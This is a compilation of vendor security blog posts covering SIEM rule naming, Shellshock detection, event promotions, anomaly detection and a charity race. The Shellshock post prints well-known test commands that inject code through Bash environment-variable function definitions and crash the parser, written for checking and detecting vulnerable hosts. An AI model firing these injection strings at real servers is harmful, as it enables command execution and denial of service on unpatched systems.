Name Changes for AI Engine Rules

With the current Knowledge Base release, LogRhythm Labs will introducing the first round of changes to AI Engine Rule organization. This initial stage involves implementing a more intuitive naming scheme for AI Engine Rules. (Note: compliance based AI Engine Rules will not change their names)

AI Engine Rule Naming Conventions

LogRhythm has over 500 AI Engine rules, and each one detects very specific, complex activity. The rules are typically named by this complex activity, but obviously names must be kept to a reasonable length. This presents a problem – an analyst needs to be able to look at any one of these 500+ rules and immediately know what the alarm indicates without needing to read an entire paragraph. Likewise, a SIEM administrator needs to choose the rules that should be enabled when LogRhythm is deployed. When rule names are too difficult to understand, these tasks can be quite challenging.

The new naming convention addresses this problem by applying a simple and consistent template: First, rule names will begin with the most important information that an analyst needs to investigate an alarm. This means labeling the rules by broader categories, giving the analyst a solid starting point. For example, rules that detect a malware event will be in the ‘Malware’ category, rules that detect suspicious network behavior will be in ‘Network Anomaly’, rules that detect a denial of service attack will be in the ‘DoS’ category, etc.

Our first iteration includes the following categories:

  • Attack – Attempts to gain access to a system, such as brute force authentication attempts or SQL Injection, or generic Attack events as generated by other deployed security devices. The source is assumed to be external to the organization’s network unless specified in the rule name.
  • Compromise – A Host or Account has been accessed by an unauthorized user or malicious process.
  • Denial of Service (DoS) – A specific type of attack that attempts to disable or interrupt use of a service or host.
  • Malware – Activity associated with known malware.
  • Misuse – Improper use of organization resources.
  • Operations (Ops) – Activity related to system and network operation. For example, unusual log fluctuations, power issues, or backup failures. Operations is also subdivided into severity levels — warning, error, critical.
  • Reconnaissance (Recon) – Techniques to identify, fingerprint, or map network devices and services.
  • Vulnerability – Information regarding vulnerabilities in the network.

And three anomaly categories for suspicious behavior that might be malicious:

  • Account Anomaly – anomalies related to identities.
  • Host Anomaly – anomalies related to endpoints.
  • Network Anomaly – anomalies related to network activity.

Following the first part of the template, names will now take a more conventional spacing and punctuation arrangement by using a colon and space (‘: ‘) to separate the end of the rule name.

This final part of the name will be a brief description of the specific activity associated with the rule. To meet limitations of the software, several abbreviations are used. For example, ‘Auth’ for authentication or login, ‘Admin’ for administrator or privileged user, ‘Ops’ for operations, etc. For directionality (inbound, outbound, internal, etc), only unusual or critical information will be placed into the name. Otherwise, the most common directionality of the security event will be assumed and thus not be present in the rule name. For example, attacks against web servers generally come from external sources, while malware beacons come from internal hosts. Because this is fairly obvious, those names don’t need to include directionality. However, if the web server as being attacked from an internal source or malware is beaconing inside the organization’s network, that is a critical situation, and names will reflect that a possible compromise has occurred.

Here are a couple of examples of the transition from old to new format:

Acnt Susp:Abnormal File Access
-> Account Anomaly: Abnormal File Access

Ext:Host Atck:XSS Attack
-> Attack: Cross-site Scripting (XSS)

Int:Host Comp:Attack/Compromise Followed by Critical
-> Compromise: Lateral Movement then Critical Event

Int:Susp:Multiple Object Access Failures
-> Host Anomaly: Multiple Object Access Failures

Ext:Susp:LR Threat List:URL:Bot
-> Malware: Threat List Bot URL

New Documentation

Security Module documentation should now be updated to also reflect the new naming system. In the coming months, additional changes will be made to how rules are grouped together in the Knowledge Base.

Likewise, the Threat Detection Cookbook will now have an updated format. If you’re unfamiliar with the Cookbook, it’s a document maintained by LogRhythm Labs that explains the usage of a few dozen notable AI Engine Rules. If you want to check out the latest version, head over to the How To section of the support forum:

Tags: ,

none | SecuritySIEM


Bash Vulnerability Detection

So I won’t bore anyone with the details on this very popular BASH bug since there is already a ton of great write-ups written by many other researchers out there. However, I do think it’s important to point out that this vulnerability has the highest common vulnerability score (CVSS) of 10. A score that not even the infamous Heartbleed achieved. In my own research this score is definitely warranted due to the sheer number of affected hosts. Even in in our own malware research lab we couldn’t find a single machine that wasn’t vulnerable. This really makes me wonder just how many other hosts out there are also vulnerable to this bug. So, let’s quickly recap and talk a little bit about the 6 (and counting) CVE’s related to his recent Bash exploit.


Processes trailing strings after function definitions of environment variables.

       env x=’() { :;}; echo vulnerable’ bash -c “echo test”


Untrusted pointer use issue leading to code execution.

       Details not yet made public


Inability to properly parse function definitions in the values of environment variables.

       Details not yet made public


Shows that the processing of trailing strings after function definitions still exists after the fix for CVE-2014-6271 was released.

       env X=’() { (a)=>\’ sh -c “echo date”; cat echo

A file named echo will be created with date in it.


Causes a denial of service (out-of-bounds array access) by way of multiple <<EOF declarations.

       bash -c ‘true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF’ || echo “CVE-2014-7186 vulnerable, redir_stack”


Causes a denial of service (out-of-bounds array access) through an off-by-one error in the read_token_word function in parse.y.

       (for x in {1..200} ; do echo “for x$x in ; do :”; done; for x in {1..200} ; do echo done ; done) | bash || echo “CVE-2014-7187 vulnerable, word_lineno”

The real challenge with all these vulnerabilities is that there are so many different ways that these exploits can be leveraged that it’s nearly impossible to deploy one solution that will detect all attack vectors. However, we’ve already seen multiple attacks in the wild come in the form of a web request to your apache or other Linux-flavored webserver (just like it did in this HTTP proof). So, the obvious methods for detection here are going to be in these HTTP headers:

  • User-Agent strings
  • Cookies
  • Host (server)
  • Referrer

And also:

  • Web server error and access logs

LogRhythm Labs team has developed a set of rules to alert you to these attacks when they are observed by your webserver. You can find these rules in the latest LogRhythm Knowledge Base under AIE Rule IDs 559 and 660, Attack: Bash Vulnerability Exploit.

Bash Vulnerability LogRhythm SmartResponse Rule


none | Security


LogRhythm is at Les Assises, IT-SA and IP-EXPO in October 2014

We’re gearing up for a busy October! Next month, we’ll be at three events in three different countries, with booths at Les Assises in Monaco, IT-SA in Nuremberg and IP-EXPO in London. With our cyber security experts on hand, we’re ready to help organizations around the world detect and respond to threats and breaches more effectively. Here’s a quick rundown of what to expect at the events:

Les Assises, Monaco 1-4 October 

  • Catch our seminar. Nicolas Stricher and Jean Pierre Carlin will be leading a seminar titled ‘Cyber-attacks have evolved; have your security defenses?’ Drop in on their talk on 2nd October at 10:00 to find out what security intelligence tools are needed to give pervasive visibility of your network. 
  • Meet our team of experts. Stop by our booth and have all your questions answered. Our dedicated team has the experience and knowledge of combating today’s most sophisticated cyber threats, and will be on hand to chat all things security related at the show.
  • Check out our demos. Our solutions are award-winning and continue to be recognized amongst the most innovative in the industry. From our Cyber Threat Ecosystem to our Honeypot and Retail Security Analytics Suite, our solutions are enabling organizations to quickly detect and respond to threats and breaches. Just stop by the booth to see for yourself!

IT-SA, Nuremberg 7-9 October 

  • Come and say hi. We’ll be at our partner, Exclusive Networks’ stand in hall 12, 12.0-401. Our experts have seen the most sophisticated cyber threats in action and know the advanced tools needed to combat them. With this firsthand experience, the team will be ready for all of your IT security questions – no matter how tough!
  • Which solution is best for you? Our security intelligence solutions are enabling German organizations from multiple sectors to combat cybercrime. To find out which one is best suited to your needs, stop by the booth and ask a member of the team.

IP-EXPO, London 8-9 October

  • You can’t miss us! Our stand B2 is right at the front, so you have no excuse not to stop and have a chat with one of our experts! Our team will be available to answer any questions you may have and ensure you leave with a better understanding of how to combat today’s sophisticated cyber threats.
  • Join our seminar. I will be leading a seminar titled, ‘Cyber-attacks have evolved; have your security defenses?’ on Wednesday 8th October at 12:20 in the Cyber Attack Remediation and Mitigation theatre. Stop by to hear why antivirus and perimeter security measures are no longer enough, and why monitoring and remediation technologies are more important than ever to proactively fight cybercrime.
  • Is today your lucky day? We’ll be giving away a GoPro Hero 3 video camera at the booth!  For the chance to win, simply pop by and leave your business card with us.  We’ll be announcing the winner on the booth and via our Twitter feed – so make sure you’re following us (@LogRhythm).
  • Experience award winning solutions first hand. If you stop by our booth you’ll see live demos of our award winning SIEM platform. See for yourself how our security intelligence solutions ensure proactive, continuous monitoring to detect and remediate abnormal activity, thus mitigating damage inflicted by cyber attacks. Our dedicated team have created the sophisticated tools needed to combat cybercrime, so find out how they can help you!

There’s still plenty of time to register for all three, so you really have no excuse for not coming to see us!

none | Uncategorized


Anomaly Detection and Cyber Discovery

Utilizing signature-related detection, such as traditional Antivirus or Intrusion Detection Systems, is obviously an important best-practice for any information security operation. However, for detection of advanced threats, static signatures will simply not be effective — even without their techniques being publicly disclosed, advanced malicious actors will constantly change their infrastructure and malicious code to easily avoid these countermeasures.

To find new, previously unknown malicious activity (a process known as ‘cyber discovery’), anomalous behavior detection is the most effective method. Being able to perform cyber discovery is the vital step that separates an active security operation team capable of finding novel, targeted attacks from a reactive one, only capable of implementing signatures after they or another organization have already been compromised. Monitoring suspicious behaviors is one of the first steps that allows the security operations team to actively hunt down advanced threats within their network.

Although there’s no widely accepted taxonomy, the two primary methodologies used to detect security-related anomalous activity are statistical and heuristic:

  • Statistical anomalies – if a measured, important value crosses a threshold or deviates from any type of mathematical norm, this can be used as an indicator or malicious activity. For example, if a user typically sends 2GB of data a day, but is sending 2TB, this might be a sign of data exfiltration.
  • Heuristic anomalies – general, suspicious behaviors that are related to actions a malicious actor takes during an attack cycle. For example, if an organization is seeing many open connections to a country where they don’t conduct business, this should be a warning sign. Likewise, if a point of sale system only ever runs a known group of processes, but then suddenly a new one appears, it should be treated as highly suspect.

Although a vital step for high levels of security, anomaly detection also involves a great deal of time, effort, and expertise. By their definition, anomalies are not necessarily proof of malicious activity, only a clue that something strange is happening. If a signature is considered a ‘strong’ indicator, only firing when the detected behavior exactly matches known malicious activity (eg, a string or URL), then heuristics would be ‘weak’ indicators, firing when something may be malicious. As a result, this will generate many false positive alerts and require more in-depth investigation of those alerts.

Additionally, specialized tools will be needed across a multitude of data sources — network traffic monitoring, host-based monitoring, user activity tracking, etc. Any tools that hope to perform anomaly detection must be both extremely flexible and extremely powerful — storing data and calculating statistical and heuristic anomalies for a multi-Gbps network with thousands of users is incredibly complex and resource intensive. Implementing an interface that easily allows for both the creation of anomaly rules and their investigation is also quite challenging.

Fortunately, SIEMs with advance rule engines (like LogRhythm) can bring together all of the important data across the network, implement anomaly detection rules, and allow analysts to drill down into the results. Just keep in mind that the software itself will never perform cyber discovery — this can only be accomplished when used alongside a trained security operations team capable of analyzing its output. But when used together, an organization has equipped itself with the means of defending against the most advanced adversaries.

Tags: ,

none | SecuritySIEM


Colorado Tough Mudder 2014

This past weekend, I joined 7 other LogRhythm employees and participated in an event called the Tough Mudder, in Snowmass, Colorado.  Tough Mudder events are held around the world, throughout the year, to raise money for Veteran’s Organizations based in various countries, including Wounded Warrior Project (USA), Help for Heroes (UK) and Legacy (AU).  The event was an 11 mile race that began at 8,200 ft. above sea level and climbed an additional 2,500 ft., and included 25 military-style obstacles designed by British Special Forces.

The LogRhythm team consisted of Jay Strickland and Keith Willowhawk from our IT/IS group, Nama Illo from our Customer Care team, JoJo Brotamonte and Eric Howell from Sales, and Katie Herrmann, Colby Schwartz and myself from Marketing.  Despite the heat, the elevation, the electric shock treatments, the “arctic enema” (yes that’s actually the name of an obstacle that is an industrial sized dumpster filled with ice water into which participants are required to plunge), and massive walls of mud and rock, we completed the course with the team intact and with wide, albeit muddy, smiles.

Shock Therapy

Shock Therapy

We all felt the joy and satisfaction that comes from finishing an event like the Tough Mudder.  Coming together as a team in a spirit of comradery, support and collaboration made it even sweeter.  But the peak of our day was toasting the generosity of our supporters and sponsors who collectively donated over $5,300 to the Wounded Warrior Project.  As LogRhythm employees, we get to come to work every day knowing that we’re helping to protect the world from dangerous cyber threats, and that’s pretty cool.  But knowing that spending an afternoon with my coworkers for an adventure in the mud and frigid waters of Snowmass, supported by extremely generous sponsors, will help some true heroes breathe a little easier, walk a little straighter or hug their loved ones a little tighter, takes the joy and satisfaction to a whole new level.

Many thanks to my team members, our generous sponsors, the Tough Mudder organization and the Wounded Warrior Project for making this event so successful.  But most of all, thanks to all of the men and women of our armed services for sacrificing themselves ever day to protect and preserve our very way of life.

LogRhythm Tough Mudders

LogRhythm Tough Mudders

none | Uncategorized